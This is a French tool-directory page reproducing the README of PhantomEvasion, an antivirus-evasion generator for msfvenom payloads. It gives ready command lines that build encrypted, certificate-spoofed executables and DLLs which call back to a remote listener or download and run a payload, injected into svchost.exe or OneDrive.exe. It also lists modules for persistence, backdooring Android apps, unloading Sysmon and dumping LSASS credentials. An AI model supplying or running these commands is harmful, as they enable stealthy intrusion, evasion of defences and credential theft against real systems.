Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PhantomEvasion — Outil d'évasion antivirus basé sur Python générant des exécutables indétectables à partir de charges utiles msfvenom avec des techniques avancées comme l'injection de code factice, le chiffrement, l'usurpation de certificats et plusieurs méthodes d'exécution. | Kitploit
Outils/GitHubGitHub/esskumar/phantomevasion
Escalade de PrivilègesFrameworks d'ExploitationGénération de PayloadsMécanismes de PersistanceShellcodePost-ExploitationTests d'IntrusionRed Teaming
GitHubesskumar/phantomevasion

PhantomEvasion

Outil d'évasion antivirus basé sur Python générant des exécutables indétectables à partir de charges utiles msfvenom avec des techniques avancées comme l'injection de code factice, le chiffrement, l'usurpation de certificats et plusieurs méthodes d'exécution.

171il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

PHANTOM EVASION 3.0

Phantom-Evasion est un outil de contournement d'antivirus écrit en Python (compatible avec Python et Python3) capable de générer un exécutable (presque) totalement indétectable, même avec les charges utiles msfvenom x86 les plus courantes.

Les systèmes d'exploitation suivants prennent officiellement en charge l'installation automatique :

  1. Kali Linux
  2. Parrot Security

Les systèmes d'exploitation suivants prennent probablement en charge l'installation automatique mais nécessitent l'installation manuelle de metasploit-framework :

  1. OSX (testé sur Catalina)
  2. Ubuntu
  3. Linux Mint
  4. Elementary
  5. Deepin
  6. autres distributions Debian
  7. Centos
  8. Fedora
  9. Blackarch

Les systèmes d'exploitation suivants nécessitent une installation manuelle :

  1. Windows 10

Il suffit de cloner ou de télécharger et de décompresser le dossier Phantom-Evasion.

Installation :

Installation automatique, ouvrez un terminal et exécutez :

root@kitploit:~
python3 phantom-evasion.py --setup

ou :

root@kitploit:~
chmod +x ./phantom-evasion.py

./phantom-evasion.py --setup

ou démarrez phantom-evasion en mode interactif et sélectionnez l'option 7.

Dépendances (uniquement pour installation manuelle)

  1. metasploit-framework
  2. mingw-w64 (cygwin sous Windows)
  3. gcc-multilib
  4. apktool
  5. apksigner
  6. strip
  7. osslsigncode

MODE LIGNE DE COMMANDE / INTERACTIF :

  1. Lancez phantom-evasion en mode interactif :
root@kitploit:~
python3 phantom-evasion.py

ou :

root@kitploit:~
./phantom-evasion.py
  1. Sinon, pour voir les options du mode ligne de commande :
root@kitploit:~
python3 phantom-evasion.py --help

ou :

root@kitploit:~
./phantom-evasion.py --help

Modules WINDOWS

  • Chaque module de charge utile Windows C peut être compilé (prend en charge x86 et x64) en EXE ou DLL/DLL Réflexive.
  • Injection de code aléatoire (junkcode) (l'intensité, la fréquence et la probabilité de réinjection peuvent être définies) et techniques de contournement d'antivirus Windows (la fréquence peut être définie).
  • Chiffrement multibyte Xor/Vigenere du shellcode/fichier pris en charge dans les modules d'injection de shellcode et de téléchargement et exécution.
  • Techniques d'unhookapi Ntdll et de masquage de processus Peb prises en charge.
  • Large gamme de modes d'exécution pris en charge (à la fois local et distant).
  • Large gamme de modes d'allocation mémoire de charge utile (Virtual_RWX, Virtual_RW/RX, Virtual_RW/RWX, Heap_RWX).
  • Chargement dynamique des API Windows possible.
  • Spoofer et signataire de certificat pris en charge.
  • Exécutable strip (https://en.wikipedia.org/wiki/Strip_(Unix))

Injection de shellcode Windows C

Les charges utiles msfvenom Windows et les shellcodes personnalisés sont pris en charge. Le shellcode peut être stocké en tant que ressource et récupéré lors de l'exécution avec l'API FindResource.

Chiffrement du shellcode pris en charge :

root@kitploit:~
1. aucun

2. Multibyte-Xor

3. Multibyte-Xor à double clé

4. Vigenere

5. Vigenere à double clé
  1. La méthode d'exécution locale peut être l'une des suivantes :

    Thread

    APC

    Le mode d'allocation mémoire locale peut être l'un des suivants :

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

  2. La méthode d'exécution distante peut être l'une des suivantes :

    ThreadExecutionHijack (abrégé en TEH)

    Processinject (abrégé en PI)

    APCSpray (abrégé en APCS)

    EarlyBird (abrégé en EB)

    EntryPointHijack (abrégé en EPH)

    Le mode d'allocation mémoire distante peut être l'un des suivants :

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

Stager meterpreter pur C Windows (C)

Modules stager meterpreter pur C (TCP/HTTP/HTTPS) compatibles avec msfconsole et cobalt strike beacon. (reverse_tcp/reverse_http/reverse_https)

En utilisant le mode ligne de commande :

root@kitploit:~
reverse_tcp c stager est WRT

reverse_http c stager est WRH

reverse_https c stager est WRS
  1. La méthode d'exécution locale peut être l'une des suivantes :

    Thread

    APC

    Le mode d'allocation mémoire locale peut être l'un des suivants :

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

Windows Download-Exec NoDiskWrite (C)

Télécharge un exe/dll depuis l'URL fournie en mémoire et exécute/charge dans un processus distant (sans écrire sur le disque).

Téléchargement d'EXE/DLL chiffré pris en charge :

root@kitploit:~
1. aucun

2. Multibyte-Xor

3. Multibyte-Xor à double clé

4. Vigenere

5. Vigenere à double clé

La DLL/EXE chiffré sera enregistré sous originalfilename + "crypt" + ".dll" ou ".exe" ; c'est celui-ci qui doit être téléchargé.

  1. Windows DownloadExecExe NoDiskWrite (WDE en mode ligne de commande) :

    La méthode d'exécution distante peut être l'une des suivantes :

    ProcessHollowing (abrégé en PH)

  2. Windows DownloadExecDll NoDiskWrite (WDD en mode ligne de commande) :

    La méthode de chargement distant peut être l'une des suivantes :

    ReflectiveDll (abrégé en RD)

    RDAPC (ReflectiveDllAPC)

    ManualMap (abrégé en MM) ---> uniquement x86

CHARGES UTILES LINUX

Module d'injection de shellcode Linux (C)

Les charges utiles msfvenom Linux et les shellcodes personnalisés sont pris en charge.

CHARGES UTILES ANDROID

  1. Android Msfvenom Obfuscate Backdoor :

    Obfusquer les charges utiles msfvenom et reconstruire (smali/baksmali) avec apktool. La charge utile obfusquée peut être utilisée pour backdoor des fichiers apk bénins.

Modules de PERSISTANCE

  1. Windows Persistence RegCreateKeyExW Ajouter une clé de registre (C) L'exécutable compilé doit être téléchargé sur la machine cible et exécuté en spécifiant le chemin complet du fichier à ajouter au démarrage en argument.

  2. Windows Persistence REG Ajouter une clé de registre (CMD) Ce module génère des charges utiles en ligne de commande de persistance (Ajouter une clé de registre via REG.exe).

  3. Windows Persistence Keep Process Alive (C) L'exécutable compilé doit être téléchargé sur la machine cible et exécuté. Utilise CreateToolSnapshoot, ProcessFirst et ProcessNext pour vérifier toutes les X secondes si le processus spécifié est actif (sinon, crée un nouveau processus en utilisant l'API WinExec).

  4. Windows Persistence Schtasks (CMD) Ce module génère des charges utiles en ligne de commande de persistance (en utilisant Schtasks.exe).

  5. Windows Persistence Create Service (CMD) Ce module génère des charges utiles en ligne de commande de persistance (en utilisant sc.exe).

Modules d'ÉLÉVATION DE PRIVILÈGES

  1. Windows DuplicateTokenEx (C) Crée un nouveau processus avec un jeton cloné à partir d'un autre processus. L'exécutable compilé doit être téléchargé sur la machine cible et exécuté.

Modules de POST-EXPLOITATION

  1. Windows Unload Sysmon (C) Décharge le pilote sysmon, ce qui arrête l'enregistrement des journaux d'événements sysmon. L'exécutable compilé doit être téléchargé sur la machine cible et exécuté.

  2. Windows Unload Sysmon (CMD) Décharge le pilote sysmon, ce qui arrête l'enregistrement des journaux d'événements sysmon.

  3. Windows Attrib hide file (CMD) Utilise attrib pour masquer un fichier.

  4. Windows SetFileAttribute hidden (C) Masque un fichier en utilisant l'API SetFileAttribute. L'exécutable compilé doit être téléchargé sur la machine cible et exécuté.

  5. Windows DumpLsass (C) Vide Lsass en utilisant l'API MiniWriteDumpWrite. L'exécutable compilé doit être téléchargé sur la machine cible et exécuté.

  6. Windows DumpLsass (CMD) Vide Lsass depuis la ligne de commande.

Exemples de mode ligne de commande de Phantom-Evasion :

  1. injection de shellcode Windows, sortie exe signé avec certificat HTTPS usurpé, méthode d'exécution locale : Thread, mémoire : Virtual_RWX, chiffrement : vigenere
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 192.168.1.123 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o filename.exe
  1. injection de shellcode Windows x64, sortie en dll réflexive, méthode d'exécution distante : ProcessInject (PI), mémoire : Virtual_RW/RX, processus cible : SkypeApp.exe, chiffrement : xor à double clé
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp SkypeApp.exe -i PI -e 3 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -R -o filename.dll
  1. injection de shellcode Windows x64, sortie en dll strip, shellcode stocké en tant que ressource, méthode d'exécution distante : EarlyBird (EB), mémoire : Virtual_RW/RX, processus cible : svchost.exe, chiffrement : xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp svchost.exe -i EB -e 2 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -res -S -o filename.dll
  1. stager reverse https Windows x64, sortie en dll strip, méthode d'exécution locale : Thread, mémoire : Heap_RWX
root@kitploit:~
python3 phantom-evasion.py -m WRS -a x64 -H 192.168.1.123 -P 4444 -i Thread -mem Heap_RWX -j 1 -J 15 -jr 0 -E 5 -f dll -S -o filename.dll
  1. Windows x86 downloadexec dll, sortie en exe strip, méthode d'exécution distante : ManualMap (MM), processus cible : OneDrive.exe, taille de téléchargement : 1000000 octets
root@kitploit:~
python3 phantom-evasion.py -m WDD -U http://192.168.1.123/payload.dll -i MM -tp OneDrive.exe -ds 1000000  -j 10 -J 10 -jr 0 -E 10 -f exe -S -o filename.exe
  1. Windows x64 downloadexec exe, sortie en dll réflexive strip, méthode d'exécution distante : ProcessHollowing (PH), processus cible : svchost.exe, taille de téléchargement : 1000000 octets
root@kitploit:~
python3 phantom-evasion.py -m WDE -U http://192.168.1.123/payloadcrypt.exe -e 4 -ef payload.exe -i PH -tp svchost.exe -ds 1000000  -j 1 -J 5 -jr 0 -E 3 -f dll -R -S -o filename.dll

Licence

GPLv3.0

Crédits et ressources utiles

https://github.com/stephenfewer/ReflectiveDLLInjection

https://github.com/rsmudge/metasploit-loader

https://ired.team

https://github.com/theevilbit/injection

http://www.rohitab.com/discuss/topic/40761-manual-dll-injection/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf

Télécharger l’outil